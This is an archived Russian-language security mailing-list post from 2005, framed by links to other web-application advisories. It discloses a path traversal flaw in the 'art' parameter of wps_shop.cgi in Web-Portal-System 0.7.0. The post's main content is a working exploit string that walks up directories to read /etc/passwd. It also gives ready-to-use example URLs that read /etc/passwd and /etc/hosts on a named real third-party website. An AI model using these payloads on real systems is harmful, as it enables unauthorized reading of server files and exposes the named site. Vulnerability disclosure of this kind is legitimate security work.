Related information PHP, ASP, CGI web applications security vulnerabilities [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch [SA15985] USANet Creations Products Shell Command Injection Vulnerability [SA15857] Emilda User Management Security Bypass Vulnerability [SA15967] Phpauction GPL Multiple Vulnerabilities From:durito <durito_(at)_mail.ru> Date:16.07.2005Subject:просмотр файлов в Web-Portal-System 0.7.0Здравствуйте, зараза. обнаружил уязвимость в Web-Portal-System 0.7.0 в скрипте wps_shop.cgi параметр art позволяет просматривать произвольные файлы на сервере Exploit: wps_shop.cgi?action=showartikel&cat=kategorie_1&art=../../../../../../../../etc/passwd Пример: http://www.scoutphila.com/cgi-bin/wps2/wps_shop.cgi?action=showartikel&cat=ka tegorie_1&art=../../../../../../../../etc/passwd http://www.scoutphila.com/cgi-bin/wps2/wps_shop.cgi?action=showartikel&cat=ka tegorie_1&art=../../../../../../../../etc/hosts -- С уважением, durito [LwB Security Team] mailto:durito@mail.ru http://lwb57.org http://durito.narod.ru
PHP, ASP, CGI web applications security vulnerabilities
[HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch
[SA15985] USANet Creations Products Shell Command Injection Vulnerability
[SA15857] Emilda User Management Security Bypass Vulnerability
[SA15967] Phpauction GPL Multiple Vulnerabilities
